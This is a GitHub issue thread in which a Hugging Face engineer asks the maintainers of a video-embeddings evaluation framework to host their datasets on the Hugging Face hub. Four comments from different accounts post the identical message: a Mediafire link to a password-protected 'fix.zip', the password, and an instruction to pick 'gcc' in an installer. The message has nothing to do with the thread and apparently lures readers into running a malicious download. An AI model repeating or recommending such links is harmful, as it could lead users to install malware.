### ISSUE TITLE
Making datasets available on HF

### ISSUE THREAD

**Issue by NielsRogge** [twelvelabs-io/video-embeddings-evaluation-framework#2]
Hi,

Niels here from the open-source team at Hugging Face. Congrats on your work! I discovered your work through the paper page: https://huggingface.co/papers/2408.11318 (feel free to claim the paper so that it appears at your HF account!).

Would you be up for making the datasets available on 🤗 , rather than Dropbox, tagging them with "pipeline_tag: video-classification" in the dataset card so that people find them when searching https://huggingface.co/datasets?

Here's some guidance: https://huggingface.co/docs/datasets/image_dataset.

This would ensure people can do the following as well:

```python
from datasets import load_dataset

dataset = load_dataset("twelvelabs-io/video-embeddings-kinetics-400")
```
in other words, people can get started with the data in 2 lines of code.

Happy to assist!

Cheers,

Niels
ML Engineer @ HF 🤗

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HyeongminLEE** [comment]
Thanks for the nice comment. We will consider adding that feature.
